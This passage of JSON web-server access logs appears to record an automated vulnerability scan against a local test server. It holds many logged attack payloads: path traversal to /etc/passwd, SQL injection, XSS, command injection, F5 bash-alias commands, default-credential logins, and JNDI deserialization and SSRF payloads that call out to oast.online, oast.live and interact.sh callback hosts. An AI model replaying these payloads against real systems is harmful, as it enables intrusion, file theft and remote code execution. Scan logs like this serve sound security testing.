Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"{\x22username\x22: \x22testpoc\x22, \x22has_admin_role\x22: true, \x22password\x22: \x22TestPoc!\x22, \x22email\x22: \x22testpoc@example.com\x22, \x22realname\x22: \x22poc\x22}\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/users HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.089","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /WebConsole/api/security/auth/loginServers HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.062","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"command=create%20cli%20alias%20private%20list%20command%20bash","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.067","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mysql.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.077","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?s=%3Cimg%20src%3Dx%20onerror%3Dalert%28123%29%3B%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.asp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.078","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"{\x0D\x0A \x22@type\x22:\x22org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup\x22,\x0D\x0A \x22jndiNames\x22:\x22rmi://c9v8hs0smpv8c6ag07h0turh43t4opiuj.oast.online/Exploit\x22\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?IO.popen(%27cat%20%2Fetc%2Fpasswd%27).read%0A%23 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.078","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"_charset_=utf-8&j_username=grios&j_password=password&j_validate=true","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /libs/granite/core/content/login.html/j_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"http://127.0.0.1/libs/granite/core/content/login.html", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"_charset_=utf-8&j_username=admin&j_password=admin&j_validate=true","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /libs/granite/core/content/login.html/j_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.313","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"http://127.0.0.1/libs/granite/core/content/login.html", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.100","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/mail-masta/inc/lists/csvexport.php?pl=/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /swagger.yaml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.snyk HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sql.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"{\x0D\x0A \x22user\x22: {\x0D\x0A \x22$func\x22: \x22var_dump\x22\x0D\x0A }\x0D\x0A}\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /auth/requestreset HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /man.cgi?redirect=setting.htm%0d%0a%0d%0a&failure=fail.htm&type=dev_name_apply&http_block=0&TF_ip0=192&TF_ip1=168&TF_ip2=200&TF_ip3=200&TF_port=&TF_port=&B_mac_apply=APPLY HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.106","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"fileName=%2Ftmp%2Fnonexistent&content=echo%20%27aDNsbDBfdzBSbGQK%27%20%7C%20base64%20-d","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /tmui/locallb/workspace/fileSave.jsp HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.052","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"_charset_=utf-8&j_username=replication-receiver&j_password=replication-receiver&j_validate=true","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /libs/granite/core/content/login.html/j_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.045","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"http://127.0.0.1/libs/granite/core/content/login.html", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mobile.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.047","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Images/Remote?imageUrl=http://c9v8hn0smpv8c57g0t00xk45a3ssaqbxi.oast.live HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.050","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /upgrade_handle.php?cmd=writeuploaddir&uploaddir=%27;whoami;%27 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.050","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /build.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.232","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"{\x0D\x0A \x22@type\x22:\x22br.com.anteros.dbcp.AnterosDBCPConfig\x22,\x0D\x0A \x22metricRegistry\x22:\x22rmi:/c9v8hs0smpv8c6ag07h0wnx7rnajhtspz.oast.online/Exploit\x22\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.063","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /swagger/v1/swagger.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.048","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/adminer/adminer.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.046","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/uploads/database-backups/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.061","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Reports/Pages/Folder.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.061","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /member/ajax_membergroup.php?action=post&membergroup=@`'`/*!50000Union+*/+/*!50000select+*/+md5(999999)+--+@`'` HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.052","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"btnPost=Log+In&username={{username}}&password=0a7ef986b3b5ab8a809774cf3d09ec16&savedate=0","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /zb_system/cmd.php?act=verify HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.062","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?q=20)%20%3D%201%20OR%20(select%20utl_inaddr.get_host_name((SELECT%20version%20FROM%20v%24instance))%20from%20dual)%20is%20null%20%20OR%20(1%2B1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.047","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"command=list%20%2Ftmp%2Fnonexistent","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.053","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.json/FNZ.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.253","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"aws.interact.sh","request":"GET http://aws.interact.sh/opc/v1/instance HTTP/1.1","status":"400","body_bytes_sents":"0","req_time":"5.248","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"POST /guest_auth/guestIsUp.php","status":"400","body_bytes_sents":"154","req_time":"0.044","http_user_agent":"-", "http_referer":"-", "request_method":"-", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"_charset_=utf-8&j_username=vgnadmin&j_password=vgnadmin&j_validate=true","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /libs/granite/core/content/login.html/j_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.060","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"http://127.0.0.1/libs/granite/core/content/login.html", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Items/RemoteSearch/Image?ImageUrl=http://c9v8hn0smpv8c57g0t00a41tx5p65bfnq.oast.live&ProviderName=TheMovieDB HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.065","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /desktop.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.058","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /names.nsf/People?OpenView HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.060","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /setup.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.060","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /analytics/saw.dll?bieehome&startPage=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.057","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /swagger/v1/swagger.yaml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.070","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webmail/old/calendar/minimizer/index.php?script=...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2fetc%2fpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.249","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /zb_system/cmd.php?atc=login&redirect=http://www.example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.061","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /hue/assets/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2fpasswd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.060","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"USERNAME=student&PASSWORD=student@123&language=en&log=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /index.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.069","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pages/includes/status-list-mo%3Ciframe%20src%3D%22javascript%3Aalert%28document.domain%29%22%3E.vm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.051","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /config.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.056","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"command=delete%20cli%20alias%20private%20list","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.056","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"_charset_=utf-8&j_username=author&j_password=author&j_validate=true","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /libs/granite/core/content/login.html/j_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.060","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"http://127.0.0.1/libs/granite/core/content/login.html", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /run.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.053","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.children.1.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.065","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /download/C%3a%2fwindows%2fsystem.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.066","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /analytics/saw.dll?getPreviewImage&previewFilePath=/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.055","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pages/UI.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.064","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?piereg_logout_url=true&redirect_to=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.064","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.//WEB-INF/classes/META-INF/microprofile-config.properties HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.261","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webmail/old/calendar/minimizer/index.php?style=...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2fetc%2fpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.060","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 